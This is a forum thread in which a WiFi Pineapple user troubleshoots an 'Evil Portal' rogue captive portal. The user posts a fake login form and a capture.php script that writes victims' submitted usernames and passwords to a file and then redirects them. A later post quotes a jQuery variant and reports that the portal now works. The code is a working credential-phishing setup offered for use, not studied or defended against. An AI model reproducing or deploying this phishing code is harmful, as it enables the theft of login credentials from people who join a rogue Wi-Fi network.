Jump to content

Evil Portal not authenticating

apkehler

By apkehler
in WiFi Pineapple Mark V

 Share

Recommended Posts

apkehler Newbie

apkehler

Posted
Posted

OK, I believe I should have everything setup correctly, but something isn't working. I have Evil Portal setup to capture credentials and then redirect to $authtarget. However, when I redirect, it simply goes back to the splash page. Here are my relevant code snippets

splash.html

<form id="form"
      method="POST"
      autocomplete="off"
      action="http://172.16.42.1/capture.php?redir=$authtarget">


    <tr height=20>
    <td nowrap id="username_field">
    USERNAME:
    </td>
    <td>
    <input autocomplete="off" id="user" name="user"   style="border:1px solid gray; " value="">
    </td>
    </tr>

    <tr>
    <td nowrap id="password">
    PASSWORD:
    </td>
    <td>
    <input autocomplete="off" id="password" name="password"  style="border:1px solid gray;" type=password>
    </td>
    </tr>


<tr height=40 align="center">
<td colspan=2 align="middle">
<input style="font-weight: bold; cursor: pointer;" type="submit" name="Login" value="Login" />
</td>
</tr>
And capture.php
<?php
$user = $_POST["user"];
$pass = $_POST["password"];
$redir = $_GET["redir"];

$file = fopen("stored.txt", "a");
fwrite($file, $user . ':' . $pass . "\n");
fclose($file);

header("Location: " . $redir);

?>

When I click "Login", capture.php runs, the creds are stored, but the user is returned to (assuming I originally typed 'www.yahoo.com'): 

http://172.16.42.1:2050/nodogsplash_auth/?redir=http://172.16.42.1:2050/nodogsplash_auth/?redir=http:/www.yahoo.com/

Where they are once again presented with the login page.

Am I doing something wrong?

Thanks!

Link to comment
Share on other sites
apkehler Newbie

apkehler

Posted
  • Author
Posted (edited)

Thanks for the link. I had actually read that thread, but was trying to accomplish my task strictly with php. I tried the following javascript posted by sud0nick: 

$('.send_info_button').on("click",function(){
    $.post('/path/to/script/', {$dataToSend},function(){
        window.location = $authtarget;
    });
});

Interestingly, the post was successful, however the 'window.location' code was never executed. The browser got stuck after executing capture.php.

I actually just ended up changing my original code from GET to POST per this thread: https://forums.hak5.org/index.php?/topic/33576-howto-creating-a-simple-captive-portal-for-evil-portal/page-2

Still not sure why Option 1 nor Option 2 worked, but at least I have a working portal now!

Edited by apkehler
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...